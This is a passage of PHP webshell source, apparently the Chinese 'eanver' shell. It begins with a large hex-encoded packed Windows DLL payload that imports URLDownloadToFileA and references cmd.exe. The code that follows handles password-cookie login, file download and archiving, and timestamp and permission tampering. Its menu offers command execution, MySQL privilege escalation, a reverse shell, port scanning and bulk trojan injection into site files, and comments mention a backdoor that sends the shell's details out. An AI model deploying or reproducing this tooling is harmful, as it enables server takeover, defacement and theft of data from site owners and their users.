11140708BDDA264103BB27DA007C3F26A8742AA6443D71A376E9C18BD1783BFE3DEF0F82800E036A738314ED6F4BDC8183E2EEF95E29F3A5FF249513A9F1DFD6426811BA1C83E904720C0CB136DB8F62C86D41801E8D789075F3B9C70741FC900403BCE023D173DB852F1188078A46BE470105025608938C2D5B59C6C75CCC8D96652CD949002B25010202EBCE2679A690234621473F5DD70DE48C065F034C0744374DD3343C342C241C8B44344DD3FC8EE489448FE4E8E8ECECD3344DD3F0F0F4F4F8CD39324DF8FCBDD7007B87B01027F809FFF00305399AA6808CA0BC6C36B0D766909D0BF91133240417A30D0A2BB8555B0D2531C639FCD8F692417F240DFDE3FC77823BC2E54400F7D96543B04B8F779E9C1CF92B43082CC2D6745D900B180338606D033A02F275B76F034E584F56B6B74B08F6971FA3EE02EF026FD9807C298C902724E3952D09AB2D03AE45EB1666625A955B7FB403A6699AA6BCC4CCD4DCA6691A9AE4F7971C1C189AA6699A18141410100C699AA6690C08080404A6EB0E231F05100318E05A129A283C8BB7B56C21CC96870F8313112A210CB700ACE86FE2570FAFAE83FEE08BDE770D0000EC1A0C2715773A7256B4D59382AB1D3D530256F057752B566A082A898850D71C14229893820F56741956947414EBA96A72A31644577C54EC8157B40E5BEB56D5612ED4230603EE265D565698182B52F7616904FC8AAEFF41BE0D50BCC5273ADC3701435C147C29985047568D7C07FB2D162BF90CAD240600473B5B290E2B1E7CA55E90C3B6CA11C56056821834BFA3A546088B87803B08742246C2ED46D988E80713720FF9240A606106817D0D4C02DB6E8350F531845E39C3D9AC60B6DDBC17721507CA532C1EB22D19080C16334BA55C1DE660080C7BD27502BD40DF1283CFDEDBE158EC22C90314BD737500A20F08B1443C998A74F6466221F816F87544837E5F23E886DE04FD0C958D460CFE1EC413ABFF4620ED8D5E0C70F61B090D803874180C84884388239F4500C3A585BF2D50DDE52B116A245999F7F9D1F03DD4A80336C66D2983FA3BF137EF2083C5044381FD5FA40F8C5E3984F86E23EB4EBE3E56B93E126F843E8D0C9DA9901E9C5F8684F83BC27318C01103D6EBE48D0815EAC1E30543C70B2256C9A012346C430BFCFE07563B0D535773F7C1903683D0C93CC18F07833C50B0DA28E4361AF51B053E1E751EE28B104974084958DEDE680284F4EB0804F5EB03F6A337DE4600E836891C308A5BEB161EE4C2DA027F7B5882864329F459376A830037C674320E1F5AC9F31CD6CA7E50505031C85A7B830CB2247ED4CAE264CF731FCCA3AD8D8800AB740F00E16AD8580841533AFDECA4963B343D1C063CC0C1E7154A81B1BCF749D418C5604B9E381780360CB2AD2C98248184E169CA5190C61D5642D4920179728BC3C36C8BB1E14E4152530411590F250306F029535DEC60B404CBF0F6D915B7B10211B0FF0336E4106AC0A359B43809F2A22CDEB43F4AA87BF6F30549C0FF4AB890073C9013082CBAAED003FC0C203F087900724AA84AA8A6E9BAD83F069F038C848BA6699A7C746C645C3F5D3B8F004AA8F003C00164D134CCE03F39859CE44C404BF04B4845D375DD2C900B580378A03C0239903F4C404C405D171B855B7FF403FC344DD3750E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
1846}
1847
1848
1849//main!()
1850//后门
1851//if(isset($_POST[postpass])){
1852// show_mainp();
1853//}
1854if (@get_magic_quotes_gpc()) {
1855 foreach ($_POST as $k => $v) {
1856 if (!is_array($_POST[$k])) {
1857 $_POST[$k] = stripslashes($v);
1858 } else {
1859 $array = $_POST[$k];
1860 foreach ($array as $kk => $vv) {
1861 $array[$kk] = stripslashes($vv);
1862 }
1863 $_POST[$k] = $array;
1864 }
1865 }
1866
1867 foreach ($_GET as $k => $v) {
1868 if (!is_array($_GET[$k])) {
1869 $_GET[$k] = stripslashes($v);
1870 } else {
1871 $array = $_GET[$k];
1872 foreach ($array as $kk => $vv) {
1873 $array[$kk] = stripslashes($vv);
1874 }
1875 $_GET[$k] = $array;
1876 }
1877 }
1878}
1879//上面这一段是给特殊字符做转义,防止出现闭合问题
1880
1881//Unknown
1882if (!isset($_GET["img"])) {
1883 header("Content-Type: text/html;charset=utf8");
1884}
1885
1886//若ip与路径发生更改则重新setcookie并且通过后门发送webshell信息
1887$envlpath = md5($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
1888if (!isset($_COOKIE[$envlpath]) || $_COOKIE[$envlpath] != md5(postpass)) {
1889 if (isset($_POST['postpass'])) {
1890 if ($_POST['postpass'] == postpass) {//||$_POST['postpass']=='http200ok') { //http200ok is another password
1891 setcookie($envlpath, md5(postpass), time() + 6 * 3600);
1892 //hmlogin(); //后门
1893 echo "<meta http-equiv='refresh' content='0'>";
1894 die;
1895 } else {
1896 echo '<CENTER>密码错误</CENTER>';
1897 }
1898 }
1899
1900 islogin();
1901 exit;
1902}
1903
1904//Unknown
1905if (isset($_GET['down'])) {
1906 do_down($_GET['down']);
1907} //下载文件
1908
1909//Unknown
1910if (isset($_GET['pack'])) { //
1911 $dir = do_show($_GET['pack']); //显示路径下的文件与文件夹
1912 $zip = new eanver($dir); //压缩并打包文件
1913 $out = $zip->out;
1914 do_download($out, $_SERVER['HTTP_HOST'] . ".tar.gz"); //下载
1915}
1916
1917if (isset($_GET['unzip'])) {
1918 css_main();
1919 start_unzip($_GET['tt'], $_GET['unzip'], $_GET['unzip'], $_GET['todir']);
1920 exit;
1921}
1922
1923//定义一些系统信息
1924define('root_dir', str_replace('\\', '/', dirname(myaddress)) . '/');
1925define('run_win', substr(PHP_OS, 0, 3) == "WIN");
1926define('my_shell', str_path(root_dir . $_SERVER['SCRIPT_NAME']));
1927
1928$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
1929$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
1930$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
1931$name = isset($_POST['name']) ? $_POST['name'] : "";
1932$img = isset($_GET['img']) ? $_GET['img'] : "";
1933$p = isset($_GET['p']) ? $_GET['p'] : "";
1934$pp = urlencode(dirname($p));
1935
1936if ($img) {
1937 css_img($img);
1938}
1939if ($eanver == "phpinfo") {
1940 die(phpinfo());
1941}
1942if ($eanver == 'logout') { //退出
1943 setcookie($envlpath, "", time() - 6 * 3600);
1944 refresh_page();
1945 die();
1946}
1947
1948//目录
1949$class = array("信息操作" => array("upfiles" => "上传文件", "phpinfo" => "基本信息", "info_f" => "系统信息", "phpcode" => "执行PHP脚本"), "提权工具" => array("sqlshell" => "执行SQL执行", "mysql_exec" => "MYSQL操作", "myexp" => "MYSQL提权", "cmd" => "执行命令", "linux" => "反弹提权", "downloader" => "文件下载", "port" => "端口扫描"), "批量操作" => array("guama" => "批量挂马清马", "tihuan" => "批量替换内容", "scanfile" => "批量搜索文件", "scanphp" => "批量查找木马"), "脚本插件" => array("getcode" => "获取网页源码"));
1950$msg = array("0" => "保存成功", "1" => "保存失败", "2" => "上传成功", "3" => "上传失败", "4" => "修改成功", "5" => "修改失败", "6" => "删除成功", "7" => "删除失败");
1951css_main();
1952
1953switch ($eanver) {
1954 case "left":
1955 css_left();
1956 $str = <<<end
1957<dl><dt><a href="#" onclick="showHide('items1');" target="_self">
1958end;
1959
1960 html_n($str);
1961 html_img("title");
1962 html_n(' 本地硬盘</a></dt><dd id="items1" style="display:block;"><ul>');
1963 $ROOT_DIR = File_Mode(); //网站www的根目录
1964 html_n("<li><a title='" . $ROOT_DIR . "' href='?eanver=main&path=" . $ROOT_DIR . "' target='main'>网站根目录</a></li><li><a href='?eanver=main' target='main'>本程序目录</a></li>");
1965 for ($i = 66; $i <= 90; $i++) {
1966 $drive = chr($i) . ':';
1967 if (is_dir($drive . "/")) {
1968 $vol = File_Str("vol $drive");
1969 if (empty($vol)) {
1970 $vol = $drive;
1971 }
1972 html_n("<li><a title='" . $drive . "' href='?eanver=main&path=" . $drive . "' target='main'>本地磁盘(" . $drive . ")</a></li>");
1973 }
1974 }
1975 html_n("</ul></dd></dl>");
1976 $i = 2;
1977 foreach ($class as $name => $array) {
1978 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items" . $i . "');\" target=\"_self\">");
1979 html_img("title");
1980 html_n($name . '</a></dt><dd id="items' . $i . '" style="display:block;"><ul>');
1981 foreach ($array as $url => $value) {
1982 html_n('<li><a href="?eanver=' . $url . "\" target='main'>" . $value . "</a></li>");
1983 }
1984 html_n("</ul></dd></dl>");
1985 $i++;
1986 }
1987 html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items" . $i . "');\" target=\"_self\">");
1988 html_img("title");
1989 html_n(' 其它操作</a></dt><dd id="items' . $i . "\" style=\"display:block;\"><ul><li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li></ul></dd></dl></div>");
1990 break;
1991 case "main":
1992 css_js("1");
1993 $dir = @dir($path);
1994 $REAL_DIR = File_Str(realpath($path));
1995 if (!empty($_POST['actall'])) {
1996 echo '<div class="actall">' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver']) . '</div>';
1997 }
1998
1999 if (!empty($_POST['attam'])) {
2000 $file = $_GET['path'] . '/' . $_POST['file'];
2001 switch ($_POST['attam']) {
2002 case "c":
2003 if (!preg_match("/^[0-7]{4}$/", $_POST['inver'])) {
2004 $msg = '<p style="color:#DC143C;">属性值错误</p>';
2005 }
2006 $newmode = base_convert($_POST['inver'], 8, 10);
2007 @chmod($file, $newmode);
2008 $msg = '<p style="color:#40E0D0;">' . $file . ' 属性修改为:' . $_POST['inver'] . '</p>';
2009 break;
2010 case "d":
2011 if (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['inver'])) {
2012 $msg = '<p style="color:#DC143C;">' . $_POST['inver'] . '时间格式错误,格式为:' . date("Y-m-d H:i:s") . '</p>';
2013 } else {
2014 @touch($file, strtotime($_POST['inver']));
2015 $msg = '<p style="color:#40E0D0;">' . $file . ' 修改时间为:' . $_POST['inver'] . '</p>';
2016 }
2017 break;
2018 }
2019 echo '<div class="actall" align="center">' . $msg . '</div>';
2020 }
2021
2022 $NUM_D = $NUM_F = 0;
2023 if (!$_SERVER['SERVER_NAME']) {
2024 $GETURL = '';
2025 } else {
2026 $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/';
2027 }
2028
2029 $ROOT_DIR = File_Mode();
2030 html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'><input type='text' size='80' name='path' value='" . $path . "'> <input type='submit' value='转到'></form><br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=" . urlencode($path) . "'><input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=" . urlencode($path) . "&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=" . urlencode($path) . "&redir=1&name=');\">");
2031 html_input("file", "upfilet", "", " ");
2032 html_input("submit", "uploadt", "上传");
2033
2034
2035 if (!empty($_POST['newfile'])) {
2036 if (isset($_POST['bin'])) {
2037 $bin = $_POST['bin'];
2038 } else {
2039 $bin = "wb";
2040 }
2041 $newfile = base64_decode($_POST['newfile']);
2042 if (strtolower($_POST['charset']) == 'utf-8') {
2043 $txt = base64_decode($_POST['txt']);
2044 } else {
2045 $txt = $_POST['txt'];
2046 }
2047
2048 if (substr(PHP_VERSION, 0, 1) >= 5) {
2049 if ((strtolower($_POST['charset']) == 'utf8') or (strtolower($_POST['charset']) == 'gbk')) {
2050 $txt = iconv("UTF-8", "utf8//IGNORE", base64_decode($_POST['txt']));
2051 } else {
2052 $txt = array_iconv($txt);
2053 }
2054 }
2055 echo do_write($newfile, $bin, $txt) ? '<br>' . $newfile . ' ' . $msg[0] : '<br>' . $newfile . ' ' . $msg[1];
2056 @touch($newfile, @strtotime($_POST['time']));
2057 }
2058
